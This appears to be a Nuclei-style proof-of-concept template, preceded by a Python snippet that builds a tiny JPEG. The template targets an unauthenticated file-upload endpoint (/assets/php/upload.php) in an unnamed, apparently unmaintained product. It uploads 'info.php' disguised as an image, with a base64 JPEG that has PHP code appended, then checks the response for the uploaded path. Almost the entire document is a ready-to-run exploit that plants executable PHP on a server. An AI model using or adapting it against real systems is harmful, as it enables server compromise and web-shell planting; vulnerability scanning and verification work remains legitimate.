from PIL import Image

img = Image.new('RGB', (1, 1), color = (0, 0, 0))
img.save('small.jpg', 'JPEG')

id: poc
info:
  name: 直接上传文件
  author: xxx
  severity: high
  description: 产品已经停止更新，影响全版本，直接文件上传
http:
- raw:
  - |
    POST /assets/php/upload.php HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4)
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: close
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4Q
    Content-Length: 1194

    ------WebKitFormBoundaryMmx988TUuintqO4Q
    Content-Disposition: form-data; name="fileToUpload"; filename="info.php"
    Content-Type: image/jpeg

    {{base64_decode("/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/PXBocGluZm8oKTs/Pg==")}}
    ------WebKitFormBoundaryMmx988TUuintqO4Q--
  unsafe: false
  cookie-reuse: false
  matchers-condition: or
  matchers:
  - type: word
    part: body
    words:
    - usrimg/info.php
    condition: or